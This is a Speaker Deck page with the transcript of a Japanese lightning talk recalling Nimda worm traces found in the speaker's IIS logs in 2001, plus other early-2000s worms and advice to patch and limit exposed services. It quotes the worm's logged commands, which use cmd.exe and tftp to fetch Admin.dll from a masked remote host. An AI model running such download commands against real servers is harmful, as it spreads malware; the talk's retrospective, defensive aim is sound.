Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
あの頃(2000年頃)のインターネット / The Internet in the early...
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
tkito
January 23, 2025
Technology
1
140
あの頃(2000年頃)のインターネット / The Internet in the early 2000s
2025/01/23に開催されたSecurity.any #2 セキュリティあの頃はLTのLT資料です。
tkito
January 23, 2025
Tweet
Share
More Decks by tkito
See All by tkito
Boot2Rootをやろう / Let's play Boot2Root
tkito
0
1k
Re: SQLiから始めるRCE生活 / RCE via SQLi
tkito
0
320
権限昇格がんばるぞい LinPEAS編 / Privilege escalation using LinPEAS
tkito
2
3.6k
Linuxでの権限昇格 / Privilege Escalation in Linux
tkito
0
1k
SOC-IRとOSCP / SOC-IR and OSCP
tkito
0
140
Other Decks in Technology
See All in Technology
予期せぬコストの急増を障害のように扱う――「コスト版ポストモーテム」の導入とその後の改善
muziyoshiz
1
2k
顧客の言葉を、そのまま信じない勇気
yamatai1212
1
360
生成AIを活用した音声文字起こしシステムの2つの構築パターンについて
miu_crescent
PRO
3
210
Greatest Disaster Hits in Web Performance
guaca
0
270
ブロックテーマでサイトをリニューアルした話 / 2026-01-31 Kansai WordPress Meetup
torounit
0
470
Cosmos World Foundation Model Platform for Physical AI
takmin
0
940
配列に見る bash と zsh の違い
kazzpapa3
3
160
Agile Leadership Summit Keynote 2026
m_seki
1
640
Introduction to Sansan for Engineers / エンジニア向け会社紹介
sansan33
PRO
6
68k
Embedded SREの終わりを設計する 「なんとなく」から計画的な自立支援へ
sansantech
PRO
3
2.5k
データの整合性を保ちたいだけなんだ
shoheimitani
8
3.2k
15 years with Rails and DDD (AI Edition)
andrzejkrzywda
0
200
Featured
See All Featured
Why Mistakes Are the Best Teachers: Turning Failure into a Pathway for Growth
auna
0
54
Chasing Engaging Ingredients in Design
codingconduct
0
110
Paper Plane (Part 1)
katiecoart
PRO
0
4.3k
SERP Conf. Vienna - Web Accessibility: Optimizing for Inclusivity and SEO
sarafernandez
1
1.3k
The AI Revolution Will Not Be Monopolized: How open-source beats economies of scale, even for LLMs
inesmontani
PRO
3
3k
Leadership Guide Workshop - DevTernity 2021
reverentgeek
1
200
From Legacy to Launchpad: Building Startup-Ready Communities
dugsong
0
140
Collaborative Software Design: How to facilitate domain modelling decisions
baasie
0
140
HU Berlin: Industrial-Strength Natural Language Processing with spaCy and Prodigy
inesmontani
PRO
0
220
Accessibility Awareness
sabderemane
0
53
Visualizing Your Data: Incorporating Mongo into Loggly Infrastructure
mongodb
49
9.9k
技術選定の審美眼(2025年版) / Understanding the Spiral of Technologies 2025 edition
twada
PRO
117
110k
Transcript
あの頃(2000年頃)のインターネット 2025/01/23 Security.any #02 セキュリティあの頃はLT きとう
自己紹介 なまえ • きとう、てきとう、tkito • Twitter: @tkito しゅみ • ゲームしたり海に潜ったり徳を積んだり
2 おしごと • 企業で社内SOCの中の人とかIRとか あの頃(2000年頃)のインターネット
あの頃(2000年頃)のインターネット 3 この先、インターネット老人会的なネタが含まれます
私とパソコンとインターネット この頃はまだセキュリティ専門ではなかった • 高校生の頃 • Windows 95 • ゲームやったり友達と交流したり •
ISDN • 大学生の頃① • 自作PCを始める • Windows 98 • Linuxをいじり始める • 大学生の頃② • Windows 2000 • IISでサーバを立てて遊ぶ あの頃(2000年頃)のインターネット 4 この辺から21世紀
事件発生 2001年9月18日 • IISのサーバログに変なものが あの頃(2000年頃)のインターネット 5
Nimda • 2001年9月に大流行したワーム • IISの脆弱性を突いて感染拡大(複数ある感染経路の一つ) あの頃(2000年頃)のインターネット 6 Insider's Eye:ネットを震撼させたコンピュータ・ワーム、Nimdaを検証する 1.Nimdaの感染原理
- @IT, https://atmarkit.itmedia.co.jp/fwin2k/insiderseye/20010922nimda/nimda_02.html
何があった • アクセスログ • 実行されたコマンド • その他 • 特になし…感染までは至ってなかった? あの頃(2000年頃)のインターネット
7 cmd.exe /c dir cmd.exe /c tftp –I *.*.*.* GET Admin.dll c:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll d:¥Admin.dll cmd.exe /c tftp –I *.*.*.* GET Admin.dll e:¥Admin.dll
どうしてこうなった • セキュリティパッチを当ててなかった • 公開の必要がないサーバを公開していた あの頃(2000年頃)のインターネット 8
あの頃のワーム騒ぎ • Code Red • 2001年7月に流行 • IISの脆弱性を突いて感染拡大 • SQL
Slammer • 2003年1月に流行 • Microsoft SQL Serverの脆弱性を突いて感染拡大 • Blaster • 2003年8月流行 • Microsoft RPCの脆弱性を突いて感染拡大 • Sasser • 2004年4月に流行 • SMBの脆弱性を突いて感染拡大 あの頃(2000年頃)のインターネット 9
昔の話でしょ? • 果たしてそうかな? あの頃(2000年頃)のインターネット 10
Shodanしてみる あの頃(2000年頃)のインターネット 11 Port 445 (SMB) Port 1433 (SQL Server)
まとめ • あの頃(2000年頃)のワーム騒ぎの紹介 • 今では過去の話…というわけでもなくインターネットに公開状態のものは多い • パッチはちゃんと当てよう • 公開しないでいいものは公開しないようにしよう あの頃(2000年頃)のインターネット
12
おしまい きとう @tkito 13
tkito
muziyoshiz
yamatai1212
miu_crescent
guaca
torounit
takmin
kazzpapa3
m_seki
sansan33
sansantech
shoheimitani
andrzejkrzywda
auna
codingconduct
katiecoart
sarafernandez
inesmontani
reverentgeek
dugsong
baasie
sabderemane
mongodb
twada
